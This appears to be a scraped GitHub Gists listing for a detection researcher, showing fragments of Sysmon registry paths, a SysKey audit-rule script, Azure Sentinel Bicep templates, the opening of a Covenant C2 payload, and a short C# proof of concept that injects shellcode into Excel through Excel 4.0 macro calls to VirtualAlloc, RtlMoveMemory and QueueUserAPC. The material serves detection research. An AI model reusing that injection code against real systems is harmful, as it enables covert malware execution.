- HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational{5770385f-c22a-43e0-bf4c-06f5698ffbd9}
- HKLM\System\CurrentControlSet\Control\WMI\Security\08dd09cd-9050-5a49-02f8-46fd443360a8
- HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\ChannelReferences\0
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\ChannelReferences
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers{5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Roberto Rodriguez Cyb3rWard0g
🐶
Cyb3rWard0g
/ syskey_registry_keys_sacl_setup.ps1
Created
November 20, 2020 09:30
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Download https://github.com/OTRF/Set-AuditRule/blob/master/Set-AuditRule.ps1 | |
| Import-Module .\Set-AuditRule.ps1 | |
| $AuditRules = @" | |
| "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\JD";"Authenticated Users";"QueryValues";"None";"None";"Success" | |
| "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Skew1";"Authenticated Users";"QueryValues";"None";"None";"Success" | |
| "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\GBG";"Authenticated Users";"QueryValues";"None";"None";"Success" | |
| "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Data";"Authenticated Users";"QueryValues";"None";"None";"Success" | |
| "@ |
Cyb3rWard0g
/ poc_blog_code_section.cs
Created
September 19, 2020 23:31
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var memaddr = Convert.ToDouble(excel.GetType().InvokeMember("ExecuteExcel4Macro", BindingFlags.InvokeMethod, null, excel, new object[] { "CALL(\\"Kernel32\\",\\"VirtualAlloc\\",\\"JJJJJ\\"," + lpAddress + "," + shellcode.Length + ",4096,64)" })); | |
| var startaddr = memaddr; | |
| foreach (var b in shellcode) { | |
| var cb = String.Format("CHAR({0})", b); | |
| var macrocode = "CALL(\\"Kernel32\\",\\"RtlMoveMemory\\",\\"JJCJ\\"," + memaddr + "," + cb + ",1)"; | |
| excel.GetType().InvokeMember("ExecuteExcel4Macro", BindingFlags.InvokeMethod, null, excel, new object[] { macrocode }); | |
| memaddr++; | |
| } | |
| excel.GetType().InvokeMember("ExecuteExcel4Macro", BindingFlags.InvokeMethod, null, excel, new object[] { "CALL(\\"Kernel32\\",\\"QueueUserAPC\\",\\"JJJJ\\"," + startaddr + ", -2, 0)" }); |
Cyb3rWard0g
/ azure_log_analytics_workspace_sentinel.bicep
Last active
September 9, 2020 07:13
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| param utcValue string { | |
| default: utcNow() | |
| metadata: { | |
| description: 'Returns the current (UTC) datetime value in the specified format. If no format is provided, the ISO 8601 (yyyyMMddTHHmmssZ) format is used' | |
| } | |
| } | |
| param workspaceName string { | |
| metadata: { | |
| description: 'Name for the Log Analytics workspace used to aggregate data.' | |
| } |
Cyb3rWard0g
/ azure_bicep_output.bicep
Last active
September 9, 2020 06:43
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| output workspaceNameOutput string = uniqueWorkspace | |
| output workspaceIdOutput string = reference(workspace.id, workspace.apiVersion).customerId | |
| output workspacekeyOutput string = listKeys(workspace.id, workspace.apiVersion).primarySharedKey |
Cyb3rWard0g
/ azure_bicep_parameters.bicep
Last active
September 9, 2020 06:42
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| param utcValue string { | |
| default: utcNow() | |
| metadata: { | |
| description: 'Returns the current (UTC) datetime value in the specified format. If no format is provided, the ISO 8601 (yyyyMMddTHHmmssZ) format is used' | |
| } | |
| } | |
| param workspaceName string { | |
| metadata: { | |
| description: 'Name for the Log Analytics workspace used to aggregate data.' | |
| } |
Cyb3rWard0g
/ azure_bicep_azure_sentinel_solution.bicep
Last active
September 9, 2020 07:09
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| resource azureSentinel 'Microsoft.OperationsManagement/solutions@2015-11-01-preview' = { | |
| name: concat('SecurityInsights(',workspace.name,')') // Implicit Dependency | |
| location: 'eastus' | |
| properties: { | |
| workspaceResourceId: workspace.id | |
| } | |
| plan: { | |
| name: concat('SecurityInsights(',workspace.name,')') // Implicit Dependency | |
| product: 'OMSGallery/SecurityInsights' | |
| publisher: 'Microsoft' |
Cyb3rWard0g
/ azure_bicep_workspace_resource.bicep
Last active
September 9, 2020 06:42
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| resource workspace 'Microsoft.OperationalInsights/workspaces@2020-03-01-preview' = { | |
| name: 'UniqueWorkspaceName' // must be globally unique | |
| location: 'eastus' | |
| properties: { | |
| sku: { | |
| name: 'PerGB2018' | |
| } | |
| retentionInDays: 30 | |
| features: { | |
| immediatePurgeDataOn30Days: true |
Cyb3rWard0g
/ CovenantBinaryPayload.txt
Last active
September 1, 2020 13:18
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Linq; | |
| using System.Text; | |
| using System.Text.RegularExpressions; | |
| using System.IO.Pipes; | |
| using System.Reflection; | |
| using System.Collections.Generic; | |
| using System.Security.Cryptography; |
Cyb3rWard0g
/ Mute_Sysmon_initial_nodes.md
Last active
July 15, 2020 12:29
Cyb3rWard0g
/ evals_detection_jinja.md
Created
June 11, 2020 22:12
NewerOlder